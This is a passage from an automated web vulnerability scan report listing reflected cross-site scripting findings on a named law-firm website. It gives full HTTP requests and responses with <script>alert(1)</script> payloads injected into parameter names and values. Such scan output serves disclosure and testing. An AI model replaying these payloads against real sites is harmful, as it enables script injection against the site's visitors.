Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.6.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1843; PortletId=5980402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:42:55 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: NavId=1846; path=/
Set-Cookie: PortletId=5983402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46467


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
<div id="PDFBuilderUrl">http://www.hunton.com/professionals/uniEntity.aspx?d7874<script>alert(1)</script>67ed776ea04=1&xpST=ProfessionalDetailPDF&professional=4984&pdf=yes</div>
...[SNIP]...
5.76. http://www.hunton.com/dallas-united-states-of-america/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /dallas-united-states-of-america/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 85671<script>alert(1)</script>da71c94b3eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dallas-united-states-of-america/?85671<script>alert(1)</script>da71c94b3eb=1 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=K
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.6.10.1304742363; DefaultCulture=en-US; Mode=1; EventingStatus=1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; NavId=1846; PortletId=5983402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:42:33 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: NavId=1853; path=/
Set-Cookie: PortletId=5990402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42545


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
<div id="PDFBuilderUrl">http://www.hunton.com/locations/uniEntity.aspx?85671<script>alert(1)</script>da71c94b3eb=1&xpST=OfficeDetail&office=6&pdf=yes</div>
...[SNIP]...
5.77. http://www.hunton.com/disclaimer/uniGC.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /disclaimer/uniGC.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c62ea<script>alert(1)</script>b61219ade15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /disclaimer/uniGC.aspx?xpST=Disclaimer&c62ea<script>alert(1)</script>b61219ade15=1 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.9.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1843; PortletId=5980402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 02:13:00 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1855; path=/
Set-Cookie: PortletId=5992402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 50878


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
<div id="PDFBuilderUrl">http://www.hunton.com/disclaimer/uniGC.aspx?xpST=Disclaimer&c62ea<script>alert(1)</script>b61219ade15=1&pdf=yes</div>
...[SNIP]...
5.78. http://www.hunton.com/news/uniGC.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /news/uniGC.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a456e<script>alert(1)</script>c6ecfef4a6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/uniGC.aspx?xpST=PENSearch&a456e<script>alert(1)</script>c6ecfef4a6c=1 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1838; PortletId=5975402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=7; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.1.10.1304742363

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:42:02 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1849; path=/
Set-Cookie: PortletId=5986402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Set-Cookie: sessionKey=3274fdb8-62f1-4551-b6d0-d1d666f3e788; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 170885


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
<div id="PDFBuilderUrl">http://www.hunton.com/news/uniGC.aspx?xpST=PENSearch&a456e<script>alert(1)</script>c6ecfef4a6c=1&pdf=yes</div>
...[SNIP]...
5.79. http://www.hunton.com/news/uniGC.aspx [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /news/uniGC.aspx

Issue detail

The value of the nsextt request parameter is copied into the HTML document as plain text between tags. The payload d2516<script>alert(1)</script>da9dcb68d27 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/uniGC.aspx?xpST=PENSearch&nsextt=%27%3E%3Cscript%3Enetsparker(9)%3C/script%3Ed2516<script>alert(1)</script>da9dcb68d27 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.9.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1843; PortletId=5980402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:44:09 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1849; path=/
Set-Cookie: PortletId=5986402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 171008


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
</script>d2516<script>alert(1)</script>da9dcb68d27&pdf=yes</div>
...[SNIP]...
5.80. http://www.hunton.com/private_wealth_advisors/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /private_wealth_advisors/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7cf20<script>alert(1)</script>3a817fcf669 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /private_wealth_advisors/?7cf20<script>alert(1)</script>3a817fcf669=1 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/services/uniGC.aspx?xpST=ServiceList
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.9.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1843; PortletId=5980402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:40:34 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: NavId=1847; path=/
Set-Cookie: PortletId=5984402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45737


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
<div id="PDFBuilderUrl">http://www.hunton.com/services/uniEntity.aspx?7cf20<script>alert(1)</script>3a817fcf669=1&xpST=ServiceDetailPDF&service=66&pdf=yes</div>
...[SNIP]...
5.81. http://www.hunton.com/professionals/uniGC.aspx [LastName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /professionals/uniGC.aspx

Issue detail

The value of the LastName request parameter is copied into the HTML document as plain text between tags. The payload f4618<script>alert(1)</script>6286371e1b0 was submitted in the LastName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=Kf4618<script>alert(1)</script>6286371e1b0 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=K
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.6.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=1837; ZoneId=0

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:42:58 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1846; path=/
Set-Cookie: PortletId=5983402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43498


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
<div id="PDFBuilderUrl">http://www.hunton.com/professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=Kf4618<script>alert(1)</script>6286371e1b0&pdf=yes</div>
...[SNIP]...
5.82. http://www.hunton.com/professionals/uniGC.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /professionals/uniGC.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c47ff<script>alert(1)</script>666e8ba2714 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /professionals/uniGC.aspx?xpST=ProfessionalSearch&c47ff<script>alert(1)</script>666e8ba2714=1 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/aboutus/uniGC.aspx?xpST=AboutUs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1844; PortletId=5981402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.4.10.1304742363

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:38:42 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1846; path=/
Set-Cookie: PortletId=5983402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 172423


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
<div id="PDFBuilderUrl">http://www.hunton.com/professionals/uniGC.aspx?xpST=ProfessionalSearch&c47ff<script>alert(1)</script>666e8ba2714=1&pdf=yes</div>
...[SNIP]...
5.83. http://www.hunton.com/services/uniGC.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /services/uniGC.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 171ed<script>alert(1)</script>5282bc75c4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/uniGC.aspx?xpST=ServiceList&171ed<script>alert(1)</script>5282bc75c4e=1 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1838; PortletId=5975402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=7; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.1.10.1304742363

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:42:59 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1847; path=/
Set-Cookie: PortletId=5984402; path=/
Set-Cookie: SiteId=1837; path=/
